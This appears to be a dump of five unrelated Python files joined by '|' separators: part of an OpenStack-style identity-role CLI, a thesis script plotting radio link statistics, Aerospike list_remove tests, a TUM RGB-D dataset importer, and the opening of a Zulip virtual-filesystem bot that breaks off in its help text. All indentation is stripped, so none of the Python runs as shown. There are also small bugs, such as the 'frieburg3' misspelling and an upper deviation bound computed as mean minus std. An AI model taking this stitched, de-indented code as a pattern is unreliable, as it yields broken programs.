os_inherit_extension_inherited=parsed_args.inherited
)
for group_role in data:
group_role.group = group.name
group_role.domain = domain.name
elif parsed_args.group and parsed_args.project:
columns = ('ID', 'Name', 'Project', 'Group')
data = identity_client.roles.list(
group=group,
project=project,
os_inherit_extension_inherited=parsed_args.inherited
)
for group_role in data:
group_role.group = group.name
group_role.project = project.name
else:
sys.stderr.write("Error: If a user or group is specified, either "
"--domain or --project must also be specified to "
"list role grants.\n")
return ([], [])
return (columns,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class RemoveRole(command.Command):
"""Remove role from domain/project : user/group"""
def get_parser(self, prog_name):
parser = super(RemoveRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to remove (name or ID)',
)
_add_identity_and_resource_options_to_parser(parser)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if (not parsed_args.user and not parsed_args.domain
and not parsed_args.group and not parsed_args.project):
sys.stderr.write("Incorrect set of arguments "
"provided. See ecl --help for more "
"details\n")
return
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
kwargs = _process_identity_and_resource_options(
parsed_args, self.app.client_manager.identity)
if not kwargs:
sys.stderr.write("Role not removed, incorrect set of arguments"
"provided. See ecl --help for more details\n")
return
identity_client.roles.revoke(role.id, **kwargs)
class SetRole(command.Command):
"""Set role properties"""
def get_parser(self, prog_name):
parser = super(SetRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to modify (name or ID)',
)
parser.add_argument(
'--name',
metavar='<name>',
help='Set role name',
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if not parsed_args.name:
sys.stderr.write("Incorrect set of arguments "
"provided. See ecl --help for more "
"details\n")
return
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
identity_client.roles.update(role.id, name=parsed_args.name)
class ShowRole(command.ShowOne):
"""Display role details"""
def get_parser(self, prog_name):
parser = super(ShowRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to display (name or ID)',
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
role._info.pop('links')
return zip(*sorted(six.iteritems(role._info)))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Niklas Hauser
# All rights reserved.
#
# The file is part of my bachelor thesis and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
import os
import pylab
import logging
import datetime
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.patches import Rectangle
import scipy.stats as stats
import pandas as pd
import seaborn as sns
sns.set_style("whitegrid")
import json
import math
class Analyzer(object):
def __init__(self, link_file, selector, basename):
self.links = None
self.link_file = link_file
self.selector = selector
self.logger = logging.getLogger('LinkAnalyzer')
self.logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(name)s: %(message)s')
# console logging
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
self.logger.handlers = []
self.logger.addHandler(ch)
self.raw_file_name = "{}_{}_raw.txt".format(basename, "A-B" if self.selector == 0 else "B-A")
self.raw_dict = {}
if os.path.isfile(self.raw_file_name):
with open(self.raw_file_name, 'r') as raw_file:
try:
self.raw_dict = json.load(raw_file)
except:
print "Error: raw file corrupted!"
ids = self._read_from_raw_file('ids')
if ids == None:
print "Requiring array of property for key 'ids'"
self.links = self.link_file.get_links_for_selector(self.selector)
ids = {'A': self.link_file.id_a, 'B': self.link_file.id_b}
self._write_to_raw_file('ids', ids)
id_string = "{}-{}".format(ids['A'] if self.selector == 0 else ids['B'], ids['B'] if self.selector == 0 else ids['A'])
self.basename = "{}_{}".format(basename, id_string)
self.ranges = {'rssi': range(-100, -80),
'lqi': range(30, 110),
'power': range(0, 30),
'bit_errors': range(0, 60),
'byte_errors': range(0, 40),
'temperature': range(20, 90)}
def _write_to_raw_file(self, key, data):
nkey = key.lower().replace(" ", "_")
self.raw_dict[nkey] = data
with open(self.raw_file_name, 'w') as raw_file:
json.dump(self.raw_dict, raw_file)
def _read_from_raw_file(self, key):
nkey = key.lower().replace(" ", "_")
if nkey in self.raw_dict:
return self.raw_dict[nkey]
return None
def get_array_of_property(self, key):
nkey = key.lower().replace(" ", "_")
if self.links == None:
print "Requiring array of property for key '{}'".format(key)
self.links = self.link_file.get_links_for_selector(self.selector)
results = []
for link in self.links:
for rx in link.rx:
if nkey in rx:
results.append(rx[nkey])
return results
def get_normed_histogram_for_key(self, key):
nkey = key.lower().replace(" ", "_")
data = self._read_from_raw_file(nkey)
if data == None:
data = self.get_array_of_property(nkey.replace("hist_", ""))
self._write_to_raw_file(nkey, data)
if len(data) > 0:
return np.histogram(data, bins=sorted(list(set(data))), normed=True), set(data)
return None
def create_histogram_plot_for_key(self, key, color='r'):
nkey = key.lower().replace(" ", "_")
data = self._read_from_raw_file(nkey)
if data == None:
data = self.get_array_of_property(nkey.replace("hist_", ""))
self._write_to_raw_file(nkey, data)
if len(data) > 0:
fig, ax = plt.subplots(1)
n, bins, patches = ax.hist(data, self.ranges[nkey.replace("hist_", "")], normed=True, histtype='stepfilled', rwidth=0.8)
pylab.setp(patches, facecolor=color, alpha=0.75)
ax.set_ylabel("Occurances")
ax.set_xlabel(key)
mean = np.mean(data)
std = np.std(data)
ax.axvline(mean, color='k', linewidth=1.75)
ax.axvline(mean - std, color='0.5', linewidth=1, linestyle="-")
ax.axvline(mean + std, color='0.5', linewidth=1, linestyle="-")
hist = self.get_normed_histogram_for_key(nkey)
return fig, ax, {'hist': hist[0], 'bins': hist[1]}
return None
def create_xor_plot(self):
max_length = 12 + 32*2 + 16
bits_array = self._read_from_raw_file('xor_bits_array')
if bits_array == None:
xors = self.get_array_of_property('xor')
if len(xors) > 0:
max_length = min(max_length, max(map(len, xors)))
bits_array = [0] * max_length * 8
for xor in xors:
for ii in range(max_length):
for jj in range(8):
bits_array[ii * 8 + jj] += 1 if xor[ii] & (1 << (7 - jj)) else 0
else:
bits_array = []
self._write_to_raw_file('xor_bits_array', bits_array)
error_sum = self._read_from_raw_file('bit_error_sum')
if error_sum == None:
error_sum = sum(self.get_array_of_property('bit_errors'))
self._write_to_raw_file('bit_error_sum', error_sum)
if len(bits_array):
if error_sum >= 2:
normed_bits_array = map(lambda b: float(b)/error_sum, bits_array)
else:
normed_bits_array = bits_array
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
lines = ax.plot(range(len(normed_bits_array)), normed_bits_array)
pylab.setp(lines, color='k', linewidth=0.6)
# ax.grid(b=True, which='major', color='0.90', linestyle='-')
ax.set_axisbelow(True)
ax.add_patch(Rectangle((0, 0), 12*8, 10000, color='0.80'))
ax.set_xlim(xmin=0, xmax=max_length*8)
ax.set_ylim(ymin=0, ymax=0.0025)
plt.xticks(range(12*8, max_length*8, 64), (range(0, max_length*8, 64)))
ax.set_ylabel("Frequency of bit errors", fontsize=18)
ax.set_xlabel("Bit position", fontsize=18)
return fig, ax, {'errors': bits_array, 'sum': error_sum}
def get_time_values_for_key(self, key):
nkey = key.lower().replace(" ", "_")
results = {'time': [], 'values': []}
if self.links == None:
print "Requiring time values for key '{}'".format(key)
self.links = self.link_file.get_links_for_selector(self.selector)
for link in self.links:
for rx in link.rx:
if nkey in rx and 'timestamp' in rx:
results['time'].append(rx['timestamp'])
results['values'].append(rx[nkey])
return results
def get_mean_time_values_for_key(self, key, lower=None, upper=None):
nkey = key.lower().replace(" ", "_")
data = self._read_from_raw_file(nkey)
if data == None:
values = self.get_time_values_for_key(nkey)
data = {'time': [], 'values': []}
if len(values['time']) > 0:
data['time'].append(values['time'][0])
data['values'].append([values['values'][0]])
data_index = 0
delta_half = datetime.timedelta(minutes=1)
reference_time = data['time'][0] + delta_half + delta_half
for time_index in range(len(values['time'])):
if values['time'][time_index] <= reference_time:
data['values'][data_index].append(values['values'][time_index])
else:
data['time'].append(reference_time - delta_half)
data['values'].append([values['values'][time_index]])
data_index += 1
reference_time += delta_half + delta_half
data['time'] = map(lambda dt: int(dt.strftime("%s")), data['time'])
self._write_to_raw_file(nkey, dict(data))
else:
data = dict(data)
if len(data['time']) > 0:
data['time'] = map(lambda dt: datetime.datetime.fromtimestamp(dt), data['time'])
data.update({'mean': [], 'std_l': [], 'std_u': []})
for ii in range(len(data['time'])):
mean = np.mean(data['values'][ii])
std = np.std(data['values'][ii], ddof=1)
data['mean'].append(mean)
data['std_l'].append(max(lower, (mean - std)) if lower != None else mean - std)
data['std_u'].append(min(upper, (mean - std)) if upper != None else mean + std)
return data
def create_mean_time_plot_for_key(self, key, nax=None):
nkey = key.lower().replace(" ", "_")
data = self.get_mean_time_values_for_key(key, 0 if 'errors' in nkey else None)
if len(data['time']) > 0:
if nax == None:
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
else:
ax = nax
ax.set_ylim(ymin=min(self.ranges[nkey]), ymax=max(self.ranges[nkey]))
if 'temperature' in nkey:
key += " ($^\circ$C)"
ax.set_ylabel(key, fontsize=18)
if 'temperature' not in nkey:
ax.plot_date(data['time'], data['std_u'], c='0.5', linestyle='-', markersize=0, linewidth=1)
std_line, = ax.plot_date(data['time'], data['std_l'], c='0.5', linestyle='-', markersize=0, linewidth=1)
mean, = ax.plot_date(data['time'], data['mean'], c='k', linestyle='-', markersize=0, linewidth=1.75)
if 'temperature' not in nkey:
ax.legend([mean, std_line],
['Mean', '1 std deviation'],
loc= 2 if 'errors' in nkey else 3,
prop={'size': 12})
if nax == None:
fig.autofmt_xdate()
return ax
def create_burst_error_plot(self):
burst_error = self._read_from_raw_file('burst_errors')
# burst_error = None
if burst_error == None:
if self.links == None:
print "Requiring array of property for key 'burst_errors'"
self.links = self.link_file.get_links_for_selector(self.selector)
all_burst_errors = []
for link in self.links:
for rx in link.rx:
if 'burst_errors' in rx:
if rx['bit_errors'] > 0:
all_burst_errors.append(rx['burst_errors'])
burst_error = []
if len(all_burst_errors) > 0:
# bit errors per symbol
burst_error = [ [] for _ in range(16+1) ]
for ii in range(len(burst_error)):
for error in all_burst_errors:
burst_error[ii].append(error[ii])
self._write_to_raw_file('burst_errors', burst_error)
if len(burst_error) > 0:
one_bit_errors = float(sum(burst_error[1])) / len(burst_error[1])
relative_burst_errors = [ [0.0] * len(burst_error[length]) for length in range(len(burst_error)) ]
confidence_intervals = [[0] * (16+1), [0] * (16+1)]
sum_burst_error = [0] * (16 + 1)
mean_burst_error = [0] * (16 + 1)
df_burst_error = [0] * (16 + 1)
sd_burst_error = [0] * (16 + 1)
for length in range(1, len(burst_error)):
# normalize over mean of 1 bit errors
for sample in range(len(burst_error[length])):
relative_burst_errors[length][sample] = float(burst_error[length][sample]) / one_bit_errors
sum_burst_error[length] = sum(burst_error[length])
# confidence intervals
n, min_max, mean, var, skew, kurt = stats.describe(relative_burst_errors[length])
dev = math.sqrt(var) / math.sqrt(len(burst_error[length]))
dof = len(burst_error[length]) - 1 + 1 - 1
mean_burst_error[length] = mean
sd_burst_error[length] = dev
df_burst_error[length] = dof
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
ax.plot(range(len(sum_burst_error)), sum_burst_error)
# ax.errorbar(range(len(mean_burst_error)), mean_burst_error, yerr=stats.t.ppf(0.95, df_burst_error)*sd_burst_error,
# fmt='', ecolor='k', capthick=2)
ax.set_yscale('log')
ax.set_xlim(xmin=1, xmax=16)
ax.set_ylim(ymin=0, ymax=10e7)
ax.set_ylabel('Accumulated occurances', fontsize=18)
ax.set_xlabel('Error burst length', fontsize=18)
return fig, ax
def create_prr_plot(self, nax=None):
prr = self._read_from_raw_file('prr')
if prr == None:
# we need to know how many messages we sent, to be able to normalize all PRRs
time_messages = self.get_time_values_for_key('timeout')
# if the key 'bit_errors' is in the rx message, then there was no timeout, and the message is valid
# this can therefore be used for two PRRs: general PRR and error-free PRR
time_bit_errors = self.get_time_values_for_key('bit_errors')
# we are also interested in how good the coder was able to salvage the payload and make a PRR out of that
# if no code was used, this will be empty
time_decoded_bit_errors = self.get_time_values_for_key('decoded_bit_errors')
# if we use a coder, we need to compare the bit errors in the coded area with the decoded area
time_coded_bit_errors = self.get_time_values_for_key('coded_bit_errors')
prr = {'time': [],
'sent': [1],
'received': [0],
'received_without_error': [0],
'coded_without_error': [0],
'decoded_without_error': [0]}
if len(time_messages['time']) > 0:
# - for all messages we are only interested, how many messages per minute were sent
# - for general PRR we are only interested, how many messages per minute were received
# - for error-free PRR we are interested, how many messages per minute were received without error
# - for general PRR we are only interested, how many messages per minute were received
prr['time'].append(time_messages['time'][0])
prr_index = 0
bit_error_index = 0
coded_error_index = 0
decoded_error_index = 0
delta_half = datetime.timedelta(seconds=7, milliseconds=500)
reference_time = prr['time'][0] + delta_half + delta_half
for time_index in range(len(time_messages['time'])):
if time_messages['time'][time_index] <= reference_time:
prr['sent'][prr_index] += 1
while (bit_error_index < len(time_bit_errors['time']) and
time_bit_errors['time'][bit_error_index] <= reference_time):
prr['received'][prr_index] += 1
prr['received_without_error'][prr_index] += 1 if time_bit_errors['values'][bit_error_index] == 0 else 0
bit_error_index += 1
while (decoded_error_index < len(time_decoded_bit_errors['time']) and
time_decoded_bit_errors['time'][decoded_error_index] <= reference_time):
prr['decoded_without_error'][prr_index] += 1 if time_decoded_bit_errors['values'][decoded_error_index] == 0 else 0
decoded_error_index += 1
while (coded_error_index < len(time_coded_bit_errors['time']) and
time_coded_bit_errors['time'][coded_error_index] <= reference_time):
prr['coded_without_error'][prr_index] += 1 if time_coded_bit_errors['values'][coded_error_index] == 0 else 0
coded_error_index += 1
else:
prr['time'].append(reference_time)
prr['sent'].append(1)
prr['received'].append(0)
prr['received_without_error'].append(0)
prr['decoded_without_error'].append(0)
prr['coded_without_error'].append(0)
prr_index += 1
reference_time += delta_half + delta_half
prr['time'] = map(lambda dt: int(dt.strftime("%s")), prr['time'])
self._write_to_raw_file('prr', dict(prr))
else:
prr = dict(prr)
if len(prr['time']) > 0:
prr['time'] = map(lambda dt: datetime.datetime.fromtimestamp(dt), prr['time'])
# normalize for all sent messages
for ii in range(len(prr['time'])):
all_sent = prr['sent'][ii]
if all_sent > 0:
prr['received'][ii] = float(prr['received'][ii]) / all_sent
prr['received_without_error'][ii] = float(prr['received_without_error'][ii]) / all_sent
prr['decoded_without_error'][ii] = float(prr['decoded_without_error'][ii]) / all_sent
# prr['coded_without_error'][ii] = float(prr['coded_without_error'][ii]) / all_sent
if nax == None:
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
else:
ax = nax
zeros = np.zeros(len(prr['time']))
ones = np.ones(len(prr['time']))
legend = {'patches': [], 'labels': []}
if sum(prr['decoded_without_error']) > 0 and False:
ax.fill_between(prr['time'], y1=prr['decoded_without_error'], y2=ones, where=prr['decoded_without_error'] < ones, color='r', interpolate=True)
legend['patches'].append(Rectangle((0, 0), 1, 1, fc="r"))
legend['labels'].append("Decoded with error")
ax.fill_between(prr['time'], y1=prr['received'], y2=ones, where=prr['received'] < ones, color='0.65', interpolate=True)
legend['patches'].append(Rectangle((0, 0), 1, 1, fc="0.65"))
legend['labels'].append("Reception timeout")
# if sum(prr['coded_without_error']) > 0:
# rx_wo_error, = ax.plot_date(prr['time'], prr['coded_without_error'], markersize=0, c='k', linestyle='-', linewidth=0.8)
# else:
rx_wo_error, = ax.plot_date(prr['time'], prr['received_without_error'], markersize=0, c='k', linestyle='-', linewidth=0.8)
legend['patches'].append(rx_wo_error)
legend['labels'].append("Received without Error")
ax.set_ylim(ymin=0, ymax=1)
ax.set_ylabel('PRR', fontsize=18)
ax.legend(legend['patches'],
legend['labels'],
loc=3,
prop={'size': 12})
if nax == None:
fig.autofmt_xdate()
return ax
def create_time_plot(self, key='lqi'):
nkey = key.lower().replace(" ", "_")
values = self.get_time_plot_values_for_key(nkey)
if len(values['time']) > 0:
fig, ax = plt.subplots(1)
ax.set_ylim(ymin=min(self.ranges[nkey]), ymax=max(self.ranges[nkey]))
lines = plt.plot_date(values['time'], values['values'], markersize=1, c='k')
# ax.grid(b=True, which='major', color='0.66', linestyle='-')
ax.set_ylabel(nkey)
fig.autofmt_xdate()
return fig, ax
def create_time_plots_for_multiple_keys(self, keys):
plots = len(keys)
fig, axarr = plt.subplots(plots, sharex=True)
fig.set_size_inches(8 * 0.625, 0.625 * plots * 5.5)
for ii in range(plots):
key = keys[ii].lower().replace(" ", "_")
if 'prr' in key:
self.create_prr_plot(axarr[ii])
else:
self.create_mean_time_plot_for_key(keys[ii], axarr[ii])
fig.autofmt_xdate()
self.logger.debug("Saving Plot to file: '{}_{}'".format(self.basename, "-".join(keys)))
plt.savefig("{}_{}.pdf".format(self.basename, "-".join(keys)), bbox_inches='tight', pad_inches=0.1)
plt.close()
return axarr
def create_plot_for_key(self, key):
nkey = key.lower().replace(" ", "_")
plot = None
if nkey in ['rssi', 'lqi', 'bit_errors', 'byte_errors', 'temperature']:
plot = self.create_mean_time_plot_for_key(key)
elif nkey in ['hist_rssi', 'hist_lqi', 'hist_bit_errors', 'hist_byte_errors']:
plot = self.create_histogram_plot_for_key(nkey)
elif nkey in ['xor']:
plot = self.create_xor_plot()
elif nkey in ['prr']:
plot = self.create_prr_plot()
elif nkey in ['burst_errors']:
plot = self.create_burst_error_plot()
return plot
def save_plot_for_key(self, key):
plot = self.create_plot_for_key(key)
if plot != None:
self.logger.debug("Saving Plot to file: '{}_{}'".format(self.basename, key))
plt.savefig("{}_{}.pdf".format(self.basename, key), bbox_inches='tight', pad_inches=0.1)
# plt.savefig("{}_{}.png".format(self.basename, key))
plt.close()
def save_all_plots(self):
keys = ['LQI', 'RSSI', 'Bit Errors', 'Byte Errors', 'Burst Errors', 'Temperature',
'Hist RSSI', 'Hist LQI', 'Hist Bit Errors', 'Hist Byte Errors',
'Xor',
'PRR']
for key in keys:
self.save_plot_for_key(key)
def save_all_cached_plots(self):
keys = ['LQI', 'RSSI', 'Bit Errors', 'Byte Errors', 'Burst Errors', 'Temperature',
'Hist RSSI', 'Hist LQI', 'Hist Bit Errors', 'Hist Byte Errors',
'Xor',
'PRR'
]
for key in keys:
self.save_plot_for_key(key)
# self.create_time_plots_for_multiple_keys(['PRR', 'Bit Errors', 'LQI', 'RSSI', 'Temperature'])
def save_plot_to_file(self, plot, filename):
if len(self.links) > 0 and plot:
self.logger.debug("Saving Plot to file: '{}'".format(filename))
plot.savefig(os.path.join(os.path.dirname(__file__), '..', 'plots', filename), bbox_inches='tight')
|
|
# -*- coding: utf-8 -*-
import pytest
import sys
import random
from .test_base_class import TestBaseClass
from aerospike import exception as e
aerospike = pytest.importorskip("aerospike")
try:
import aerospike
except:
print("Please install aerospike python client.")
sys.exit(1)
class TestListRemove(object):
@pytest.fixture(autouse=True)
def setup(self, request, as_connection):
keys = []
for i in range(5):
key = ('test', 'demo', i)
rec = {'name': 'name%s' %
(str(i)),
'contact_no': [i, i + 1],
'city': ['Pune', 'Dehli']}
self.as_connection.put(key, rec)
keys.append(key)
key = ('test', 'demo', 2)
self.as_connection.list_append(key, "contact_no", [45, 50, 80])
keys.append(key)
def teardown():
"""
Teardown method.
"""
for key in keys:
try:
as_connection.remove(key)
except e.RecordNotFound:
pass
request.addfinalizer(teardown)
def test_pos_list_remove_with_correct_paramters(self):
"""
Invoke list_remove() pop string with correct parameters
"""
key = ('test', 'demo', 1)
status = self.as_connection.list_remove(key, "contact_no", 0)
assert status == 0
(key, _, bins) = self.as_connection.get(key)
assert bins == {
'city': ['Pune', 'Dehli'], 'contact_no': [2], 'name': 'name1'}
def test_pos_list_remove_with_correct_policy(self):
"""
Invoke list_remove() remove list with correct policy
"""
key = ('test', 'demo', 2)
policy = {
'timeout': 1000,
'retry': aerospike.POLICY_RETRY_ONCE,
'commit_level': aerospike.POLICY_COMMIT_LEVEL_MASTER
}
status = self.as_connection.list_remove(
key, 'contact_no', 2, {}, policy)
assert status == 0
(key, _, bins) = self.as_connection.get(key)
assert bins == {
'city': ['Pune', 'Dehli'], 'contact_no': [2, 3], 'name': 'name2'}
# Negative Tests
def test_neg_list_remove_with_no_parameters(self):
"""
Invoke list_remove() without any mandatory parameters.
"""
with pytest.raises(TypeError) as typeError:
self.as_connection.list_remove()
assert "argument 'key' (pos 1)" in str(
typeError.value)
def test_neg_list_remove_with_incorrect_policy(self):
"""
Invoke list_remove() with incorrect policy
"""
key = ('test', 'demo', 1)
policy = {
'timeout': 0.5
}
try:
self.as_connection.list_remove(key, "contact_no", 0, {}, policy)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "timeout is invalid"
def test_neg_list_remove_with_nonexistent_key(self):
"""
Invoke list_remove() with non-existent key
"""
if self.server_version < [3, 15, 2]:
pytest.skip("Change of error beginning in 3.15")
charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
minLength = 5
maxLength = 30
length = random.randint(minLength, maxLength)
key = ('test', 'demo', ''.join(map(lambda unused:
random.choice(charSet),
range(length))) + ".com")
with pytest.raises(e.RecordNotFound):
self.as_connection.list_remove(key, "contact_no", 0)
def test_neg_list_remove_with_nonexistent_bin(self):
"""
Invoke list_remove() with non-existent bin
"""
key = ('test', 'demo', 1)
charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
minLength = 5
maxLength = 10
length = random.randint(minLength, maxLength)
bin = ''.join(map(lambda unused:
random.choice(charSet), range(length))) + ".com"
try:
self.as_connection.list_remove(key, bin, 585)
except e.BinIncompatibleType as exception:
assert exception.code == 12
def test_neg_list_remove_with_extra_parameter(self):
"""
Invoke list_remove() with extra parameter.
"""
key = ('test', 'demo', 1)
policy = {'timeout': 1000}
with pytest.raises(TypeError) as typeError:
self.as_connection.list_remove(
key, "contact_no", 1, {}, policy, "")
assert "list_remove() takes at most 5 arguments (6 given)" in str(
typeError.value)
def test_neg_list_remove_policy_is_string(self):
"""
Invoke list_remove() with policy is string
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, "contact_no", 1, {}, "")
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "policy must be a dict"
def test_neg_list_remove_key_is_none(self):
"""
Invoke list_remove() with key is none
"""
try:
self.as_connection.list_remove(None, "contact_no", 0)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "key is invalid"
def test_neg_list_remove_bin_is_none(self):
"""
Invoke list_remove() with bin is none
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, None, 1)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Bin name should be of type string"
def test_neg_list_remove_with_negative_index(self):
"""
Invoke list_remove() with negative index
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, "contact_no", -56)
except e.OpNotApplicable as exception:
assert exception.code == 26
def test_neg_list_remove_meta_type_integer(self):
"""
Invoke list_remove() with metadata input is of type integer
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, "contact_no", 1, 888)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Metadata should be of type dictionary"
def test_neg_list_remove_index_type_string(self):
"""
Invoke list_remove() with index is of type string
"""
key = ('test', 'demo', 1)
with pytest.raises(TypeError) as typeError:
self.as_connection.list_remove(key, "contact_no", "Fifth")
assert "an integer is required" in str(typeError.value)
|
|
# Copyright (c) 2017, John Skinner
import os.path
import xxhash
import cv2
import util.associate
import metadata.camera_intrinsics as cam_intr
import metadata.image_metadata as imeta
import util.transform as tf
import core.image_entity
import dataset.image_collection_builder
def make_camera_pose(tx, ty, tz, qx, qy, qz, qw):
"""
TUM dataset use a different coordinate frame to the one I'm using, which is the same as the Libviso2 frame.
This function is to convert dataset ground-truth poses to transform objects.
Thankfully, its still a right-handed coordinate frame, which makes this easier.
Frame is: z forward, y right, x down
:param tx: The x coordinate of the location
:param ty: The y coordinate of the location
:param tz: The z coordinate of the location
:param qx: The x part of the quaternion orientation
:param qy: The y part of the quaternion orientation
:param qz: The z part of the quaternion orientation
:param qw: The scalar part of the quaternion orientation
:return: A Transform object representing the world pose of the current frame
"""
return tf.Transform(
location=(tz, -tx, -ty),
rotation=(qw, qz, -qx, -qy),
w_first=True
)
def read_image_filenames(images_file_path):
filename_map = {}
with open(images_file_path, 'r') as images_file:
for line in images_file:
if line.startswith('#'):
# This line is a comment
continue
parts = line.split(' ')
if len(parts) >= 2:
timestamp, relative_path = parts[0:2]
filename_map[float(timestamp)] = relative_path.rstrip() # To remove trailing newlines
return filename_map
def read_trajectory(trajectory_filepath):
"""
Read the ground-truth camera trajectory from file
:param trajectory_filepath:
:return: A map of timestamp to camera pose.
"""
trajectory = {}
first_pose = None
with open(trajectory_filepath, 'r') as trajectory_file:
for line in trajectory_file:
if line.startswith('#'):
# This line is a comment, skip and continue
continue
parts = line.split(' ')
if len(parts) >= 8:
timestamp, tx, ty, tz, qx, qy, qz, qw = parts[0:8]
pose = make_camera_pose(float(tx), float(ty), float(tz),
float(qx), float(qy), float(qz), float(qw))
# Find the pose relative to the first frame, which we fix as 0,0,0
if first_pose is None:
first_pose = pose
trajectory[float(timestamp)] = tf.Transform()
else:
trajectory[float(timestamp)] = first_pose.find_relative(pose)
return trajectory
def associate_data(root_map, *args):
"""
Convert a number of maps key->value to a list of lists
[[key, map1[key], map2[key] map3[key] ...] ...]
The list will be sorted in key order
Returned inner lists will be in the same order as they are passed as arguments.
The first map passed is considered the reference point for the list of keys,
:param root_map: The first map to associate
:param args: Additional maps to associate to the first one
:return:
"""
if len(args) <= 0:
# Nothing to associate, flatten the root map and return
return sorted([k, v] for k, v in root_map.items())
root_keys = set(root_map.keys())
all_same = True
# First, check if all the maps have the same list of keys
for other_map in args:
if set(other_map.keys()) != root_keys:
all_same = False
break
if all_same:
# All the maps have the same set of keys, just flatten them
return sorted([key, root_map[key]] + [other_map[key] for other_map in args]
for key in root_keys)
else:
# We need to associate the maps, the timestamps are a little out
rekeyed_maps = []
for other_map in args:
matches = util.associate.associate(root_map, other_map, offset=0, max_difference=1)
rekeyed_map = {root_key: other_map[other_key] for root_key, other_key in matches}
root_keys &= set(rekeyed_map.keys())
rekeyed_maps.append(rekeyed_map)
return sorted([key, root_map[key]] + [rekeyed_map[key] for rekeyed_map in rekeyed_maps]
for key in root_keys)
def get_camera_intrinsics(folder_path):
folder_path = folder_path.lower()
if 'freiburg1' in folder_path:
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=517.3,
fy=516.5,
cx=318.6,
cy=255.3,
k1=0.2624,
k2=-0.9531,
k3=1.1633,
p1=-0.0054,
p2=0.0026
)
elif 'freiburg2' in folder_path:
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=580.8,
fy=581.8,
cx=308.8,
cy=253.0,
k1=-0.2297,
k2=1.4766,
k3=-3.4194,
p1=0.0005,
p2=-0.0075
)
elif 'frieburg3' in folder_path:
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=535.4,
fy=539.2,
cx=320.1,
cy=247.6
)
else:
# Default to ROS parameters
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=525.0,
fy=525.0,
cx=319.5,
cy=239.5
)
def import_dataset(root_folder, db_client):
"""
Load a TUM image sequences into the database.
:return:
"""
if not os.path.isdir(root_folder):
return None
# Step 1: Read the meta-information from the files
rgb_path = os.path.join(root_folder, 'rgb.txt')
trajectory_path = os.path.join(root_folder, 'groundtruth.txt')
depth_path = os.path.join(root_folder, 'depth.txt')
if not os.path.isfile(rgb_path) or not os.path.isfile(trajectory_path) or not os.path.isfile(depth_path):
# Stop if we can't find the metadata files within the directory
return None
image_files = read_image_filenames(rgb_path)
trajectory = read_trajectory(trajectory_path)
depth_files = read_image_filenames(depth_path)
# Step 2: Associate the different data types by timestamp
all_metadata = associate_data(image_files, trajectory, depth_files)
# Step 3: Load the images from the metadata
builder = dataset.image_collection_builder.ImageCollectionBuilder(db_client)
for timestamp, image_file, camera_pose, depth_file in all_metadata:
rgb_data = cv2.imread(os.path.join(root_folder, image_file), cv2.IMREAD_COLOR)
depth_data = cv2.imread(os.path.join(root_folder, depth_file), cv2.IMREAD_UNCHANGED)
depth_data = depth_data / 5000 # Re-scale depth to meters
camera_intrinsics = get_camera_intrinsics(root_folder)
builder.add_image(image=core.image_entity.ImageEntity(
data=rgb_data[:, :, ::-1],
depth_data=depth_data,
metadata=imeta.ImageMetadata(
hash_=xxhash.xxh64(rgb_data).digest(),
camera_pose=camera_pose,
intrinsics=camera_intrinsics,
source_type=imeta.ImageSourceType.REAL_WORLD,
environment_type=imeta.EnvironmentType.INDOOR_CLOSE,
light_level=imeta.LightingLevel.WELL_LIT,
time_of_day=imeta.TimeOfDay.DAY,
)
), timestamp=timestamp)
return builder.save()
|
|
# See readme.md for instructions on running this code.
import re
import os
class VirtualFsHandler(object):
def usage(self):
return get_help()
def handle_message(self, message, client, state_handler):
command = message['content']
if command == "":
return
sender = message['sender_email']
state = state_handler.get_state()
if state is None:
state = {}
recipient = message['display_recipient']
if isinstance(recipient, list): # If not a stream, then hash on list of emails
recipient = " ".join([x['email'] for x in recipient])
if recipient not in state:
state[recipient] = fs_new()
fs = state[recipient]
if sender not in fs['user_paths']:
fs['user_paths'][sender] = '/'
fs, msg = fs_command(fs, sender, command)
prependix = '{}:\n'.format(sender)
msg = prependix + msg
state[recipient] = fs
state_handler.set_state(state)
client.send_reply(message, msg)
def get_help():
return '''
The "fs" commands implement a virtual file system for a stream.
The locations of text are persisted for the lifetime of the bot
running, and if you rename a stream, you will lose the info.
Example commands:
```
fs mkdir: create a directory
fs ls: list a directory
fs cd: change directory
